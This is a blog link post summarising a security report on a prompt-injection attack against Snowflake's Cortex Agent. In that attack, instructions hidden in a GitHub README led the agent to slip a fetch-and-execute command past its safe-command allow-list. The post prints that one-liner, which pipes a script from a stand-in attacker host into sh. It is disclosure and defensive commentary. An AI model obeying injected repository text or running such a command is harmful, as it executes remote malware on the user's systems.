Snowflake Cortex AI Escapes Sandbox and Executes Malware
quality 9/10 · excellent
0 net
Tags
Snowflake Cortex AI Escapes Sandbox and Executes Malware Simon Willison’s Weblog Subscribe Sponsored by: CodeRabbit — Planner helps 10x your coding agents while minimizing rework and AI slop. Try Now . 18th March 2026 - Link Blog Snowflake Cortex AI Escapes Sandbox and Executes Malware ( via ) PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent , now fixed. The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README. The attack caused the agent to execute this code: cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) Cortex listed cat commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command. I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me. I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself. Posted 18th March 2026 at 5:43 pm Recent articles GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52 - 17th March 2026 My fireside chat about agentic engineering at the Pragmatic Summit - 14th March 2026 Perhaps not Boring Technology after all - 9th March 2026 This is a link post by Simon Willison, posted on 18th March 2026 . sandboxing 35 security 579 ai 1918 prompt-injection 146 generative-ai 1701 llms 1667 Monthly briefing Sponsor me for $10/month and get a curated email digest of the month's most important LLM developments. Pay me to send you less! Sponsor & subscribe Disclosures Colophon © 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017 2018 2019 2020 2021 2022 2023 2024 2025 2026